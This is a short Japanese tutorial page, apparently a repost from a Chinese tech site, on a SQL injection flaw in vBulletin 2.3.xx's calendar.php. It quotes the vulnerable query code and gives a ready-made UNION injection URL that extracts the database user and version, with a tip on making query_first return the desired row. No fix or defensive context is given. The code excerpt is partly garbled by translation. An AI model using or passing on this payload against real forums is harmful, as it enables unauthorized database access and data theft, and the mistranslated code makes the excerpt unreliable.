vBulletinForum2.3.xxSQLInjection_PHP チュートリアル

vBulletin フォーラム 2.3.xx SQL インジェクション
calendar.php.に SQL インジェクションの問題があります
-------- Calendar.php の 585 行目からの抜粋 ----------
else if ($action == "編集")
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM Calendar_events WHEREeventid = $eventid");
--- --------------------------------------------------
MySQL バージョンが 4.00 より大きい場合、UNION 攻撃が使用される可能性があります。
-------------------------------- --------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0 ',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
------- -----------------------
query_first 関数はクエリ結果の最初の行のみを返すため、!
必要な行を返すようにしてください。

http://www.bkjia.com/PHPjc/629409.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/629409.html技術記事 vBulletin フォーラム 2.3.xx SQL インジェクション Calendar.php には SQL インジェクションの問題が存在します。 -------- Calendar.php の 585 行目から切り取り ---------- else if ($action == "edit") { $event...